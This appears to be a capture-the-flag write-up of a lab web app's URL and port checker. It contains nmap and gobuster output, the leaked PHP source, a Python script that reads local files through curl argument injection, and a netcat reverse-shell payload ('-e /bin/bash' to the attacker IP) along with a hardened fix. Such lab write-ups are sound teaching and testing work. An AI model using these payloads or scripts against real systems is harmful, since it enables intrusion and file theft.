# Victim IP
```
10.129.39.124
```
# Attacker IP
```
10.10.14.191
```
# Nmap
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA)
|_ 256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
3190/tcp filtered csvr-proxy
3329/tcp filtered hp-device-disc
4285/tcp filtered vrml-multi-use
4680/tcp filtered mgemanagement
4967/tcp filtered unknown
6336/tcp filtered unknown
7753/tcp filtered unknown
8999/tcp filtered bctp
10362/tcp filtered unknown
11051/tcp filtered unknown
11600/tcp filtered tempest-port
11903/tcp filtered unknown
12708/tcp filtered unknown
13199/tcp filtered unknown
15078/tcp filtered unknown
16140/tcp filtered unknown
17153/tcp filtered unknown
17609/tcp filtered unknown
25119/tcp filtered unknown
34475/tcp filtered unknown
35375/tcp filtered unknown
39696/tcp filtered unknown
40259/tcp filtered unknown
41464/tcp filtered unknown
44320/tcp filtered unknown
46811/tcp filtered unknown
49334/tcp filtered unknown
51690/tcp filtered unknown
54014/tcp filtered unknown
54250/tcp filtered unknown
59865/tcp filtered unknown
61349/tcp filtered unknown
62024/tcp filtered unknown
63662/tcp filtered unknown
65417/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds
Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB)
```
The target has no outbound internet access, but the "Is it down?" form still accepts any `http://` or `https://` address, so the `url` parameter is an SSRF candidate.
Have the SSRF request set up in Burp Suite Repeater.
Other schemes such as `file://` are rejected with an error.
Next: gobuster for directory / file enumeration.
# Gobuster
```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.39.124
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/]
/index.php (Status: 200) [Size: 739]
/server-status (Status: 403) [Size: 278]
Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL
[ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
```
Nothing of interest.

The `url` check can still be abused for local file reads. Requesting
```
http://+file%3a///etc/passwd
```
(`http:// file:///etc/passwd`, URL-encoded) as the `url` parameter in the POST request returns the contents of `/etc/passwd`, where the user `aleks` has `/bin/bash` as login shell. The `http://` prefix satisfies the scheme check, and the space turns `file:///etc/passwd` into a second URL argument for curl, which then reads it from the local filesystem (the mechanism is visible in the source below).

The same trick with `http:// file:///var/www/html/index.php` (URL-encoded) discloses `index.php`; after HTML-decoding the output, the source is:
```php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Is it down or just me?</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<header>
<img src="/logo.png" alt="Logo">
<h2>Is it down or just me?</h2>
</header>
<div class="container">
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
$ip = trim($_POST['ip']);
$valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
$port = trim($_POST['port']);
$port_int = intval($port);
$valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
if ( $valid_ip && $valid_port ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>';
}
} elseif (isset($_POST['url'])) {
$url = trim($_POST['url']);
if ( preg_match('|^https?://|',$url) ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/curl -s $url");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Only protocols http or https allowed.</font>';
}
}
?>
</div>
</div>
<footer>© 2024 isitdownorjustme LLC</footer>
</body>
</html>
```
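As an added helper (not the page's or the target's code): a small Python client that performs the `http:// file://` read above against the URL checker and unwraps the `<pre>`-wrapped, `htmlspecialchars()`-encoded output. It relies on exactly what the `curl` branch of `index.php` shows: `preg_match('|^https?://|')` only checks the prefix, and `escapeshellcmd()` does not escape spaces, so the rest of the value becomes a second argument to curl. `TARGET` is an assumed default built from the victim IP at the top of the notes.

```python
#!/usr/bin/env python3
"""Added example: read local files through the URL checker's curl call.

preg_match('|^https?://|') only looks at the prefix, and escapeshellcmd()
does not escape spaces, so "http:// file:///etc/passwd" reaches curl as two
URLs; the second is a file:// URL that curl reads locally. Nothing here is
the target's code; TARGET is an assumed default taken from the notes above.
"""
import html
import re
import sys
import urllib.parse
import urllib.request
from typing import Optional

TARGET = "http://10.129.39.124/index.php"  # victim IP from the notes above


def build_payload(path: str) -> str:
    """Form body for the 'url' parameter: a dummy http:// prefix, a space
    (sent as '+') and the file:// URL we actually want curl to fetch."""
    value = f"http:// file://{path}"
    # keep ':' and '/' literal so the encoded body stays readable in Burp
    return "url=" + urllib.parse.quote_plus(value, safe="/:")


def extract_output(page: str) -> Optional[str]:
    """Return the <pre> block the page wraps curl's output in, with the
    htmlspecialchars() encoding undone; None when there is no <pre>
    (the page only prints output when curl exits 0)."""
    m = re.search(r"<pre>(.*?)</pre>", page, re.S)
    return html.unescape(m.group(1)) if m else None


def read_file(path: str, target: str = TARGET, timeout: int = 15) -> Optional[str]:
    """POST the payload and return the remote file's contents, or None."""
    req = urllib.request.Request(
        target,
        data=build_payload(path).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_output(resp.read().decode(errors="replace"))


if __name__ == "__main__":
    for p in sys.argv[1:] or ["/etc/passwd"]:
        out = read_file(p)
        print(out if out is not None else f"[-] no output for {p}")
```

Usage: `python3 read_file.py /etc/passwd /var/www/html/index.php`. Paths that curl cannot read (permissions, missing file) come back as `None`, because the page only echoes curl's output when it exits with 0.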
The following part:
```php
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
```
stands out: it shows a second form when the `expertmode` GET parameter is set to `tcp`.

The handler for that form validates `$ip` with `FILTER_VALIDATE_IP` and validates `$port_int` (the `intval()` of the port), but then interpolates the original `$port` string into the `nc` command. `intval("1337 -e /bin/bash")` is `1337`, so the check passes, and `escapeshellcmd()` escapes shell metacharacters but leaves spaces and dashes alone, so the extra tokens reach `nc` as arguments. With a listener on port 1337 on the attacker box, this POST body to `index.php?expertmode=tcp` gives a reverse shell:
```
ip=10.10.14.191&port=1337 -e /bin/bash
```
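Added example (Python, not the target's PHP): a model of the `expertmode=tcp` handler's validation beside a hardened version, showing why `1337 -e /bin/bash` passes and what the fix looks like. `escapeshellcmd()` is modelled in simplified form (PHP only escapes unpaired quotes; the model always escapes them), `php_intval()` reproduces `intval()` on strings, and `tcp_form_body()` builds the POST body used above.

```python
#!/usr/bin/env python3
"""Added example: the expertmode=tcp port check, vulnerable vs. hardened.

The PHP validates $port_int (the intval() of the port) but interpolates the
original $port string into the nc command. intval("1337 -e /bin/bash") is
1337, so validation passes, and escapeshellcmd() escapes shell metacharacters
but not spaces or dashes, so the extra tokens reach nc as arguments.
This is a model written for illustration, not the target's code.
"""
import ipaddress
import re
import urllib.parse
from typing import List, Optional

# Characters PHP's escapeshellcmd() backslash-escapes (simplified: PHP only
# escapes ' and " when they are unpaired; this model always escapes them).
_ESCAPED = set("#&;`|*?~<>^()[]{}$\\\n\xff'\"")


def escapeshellcmd(cmd: str) -> str:
    """Simplified escapeshellcmd(): note that ' ' and '-' pass through."""
    return "".join("\\" + c if c in _ESCAPED else c for c in cmd)


def php_intval(s: str) -> int:
    """intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def vulnerable_command(ip: str, port: str) -> Optional[str]:
    """Mirror of the page's handler: returns the command exec() would run,
    or None when the (flawed) validation rejects the input."""
    ip, port = ip.strip(), port.strip()
    try:
        ipaddress.ip_address(ip)               # FILTER_VALIDATE_IP
    except ValueError:
        return None
    if php_intval(port) == 0:                  # filter_var(0, FILTER_VALIDATE_INT) is falsy
        return None
    # bug: the validated value was $port_int, but $port is what gets used
    return escapeshellcmd(f"/usr/bin/nc -vz {ip} {port}") + " 2>&1"


def hardened_command(ip: str, port: str) -> Optional[List[str]]:
    """Fix: digit-only port within range, and an argv list built only from
    the validated values (to be run with an exec-style API, no shell)."""
    ip, port = ip.strip(), port.strip()
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return None
    if not re.fullmatch(r"\d{1,5}", port) or not 1 <= int(port) <= 65535:
        return None
    return ["/usr/bin/nc", "-vz", ip, str(int(port))]


def tcp_form_body(attacker_ip: str, attacker_port: int, shell: str = "/bin/bash") -> str:
    """POST body for index.php?expertmode=tcp that smuggles nc's -e via the port field."""
    return urllib.parse.urlencode({"ip": attacker_ip, "port": f"{attacker_port} -e {shell}"})


if __name__ == "__main__":
    print("POST body  :", tcp_form_body("10.10.14.191", 1337))
    print("vulnerable :", vulnerable_command("10.10.14.191", "1337 -e /bin/bash"))
    print("hardened   :", hardened_command("10.10.14.191", "1337 -e /bin/bash"))
```

The `ip` field is not an injection point in the original either: `FILTER_VALIDATE_IP` rejects anything that is not a bare address, and the validated `$ip` is the value that gets used. The port field is the one where the checked value and the used value diverge.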